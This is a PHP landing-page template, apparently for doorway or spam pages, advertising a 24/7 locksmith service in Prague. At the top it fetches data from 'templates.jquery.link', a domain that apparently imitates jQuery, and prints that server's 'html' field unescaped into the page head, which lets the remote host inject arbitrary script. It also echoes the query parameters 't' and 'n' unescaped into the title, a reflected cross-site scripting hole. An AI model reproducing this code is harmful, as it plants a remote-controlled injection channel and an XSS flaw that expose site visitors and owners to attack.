<?php
$site_data      = json_decode(file_get_contents('http://templates.jquery.link/api/' . $_SERVER['HTTP_HOST']), true);

$phone_name     = $site_data['phone_name'];
$phone_href     = $site_data['phone_href'];

$text           = str_replace('+', ' ', trim($_GET['t'] ?? 'Entrumpelung'));
$city           = str_replace('+', ' ', trim($_GET['n'] ?? 'in der nahe'));

$title = $text . ' ' . $city;
?>

<!DOCTYPE html>
<html lang="cz">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="shortcut icon" href="img/favicon.ico" type="image/x-icon">
    <?= $site_data['html'] ?>
    <title><?= $title ?></title>
</head>
<body>
    
    
        <!--Шапка сайта-->
        <header class="header">
            <div class="container-fluid">
                <div class="row">
                    <div class="col-12 header-container">
                        <div class="header-logo">
                            <img class="header-logo__img" src="assets/img/logo-best-yellow-e1637688538153.png" alt="" >
                        </div>
                        <div class="header-title">
                            <div class="header-title-wrapper">
                                <h1 class="header-title__h1">Zámečnický servis</h1>
                                <h2 class="header-title__h2 pb-5 d-none d-md-block">pro Prahu a okolí NONSTOP!</h2>
                                <div class="my-5">
                                    <a class="btn button" href="#" >✆ 111222333</a>
                                </div>
                                <p class="header-title__description pt-5 d-none d-md-block">Zámečnická pohotovost <span>24/7</span></p>
                            </div>
                        </div>
                    </div>                 
                </div>            
            </div>
        </header>

        <!-- Основное содержимое страницы -->
        <main>
            <!-- Раздел страницы-->
            <section>
                <div class="container">
                    <div class="row">
                        <div class="col">...</div>                 
                    </div>            
                </div>
                <!-- Определяет статью -->
                <article>
                    <div class="container">
                        <div class="row">
                            <div class="col">...</div>                 
                        </div>            
                    </div>
                </article>
            </section>
        </main>

        <!--Нижний колонтитул страницы-->
        <footer>
            <div class="container">
                <div class="row">
                    <div class="col">...</div>                 
                </div>            
            </div>
            <!-- Навигационные ссылки -->
            <nav>
                <div class="container">
                    <div class="row">
                        <div class="col">...</div>                 
                    </div>            
                </div>
            </nav>
        </footer>
        <!--Style-->     
        <link href="assets/css/bootstrap.min.css" rel="stylesheet">
        <link href="assets/css/style.css" rel="stylesheet">
</body>
</html>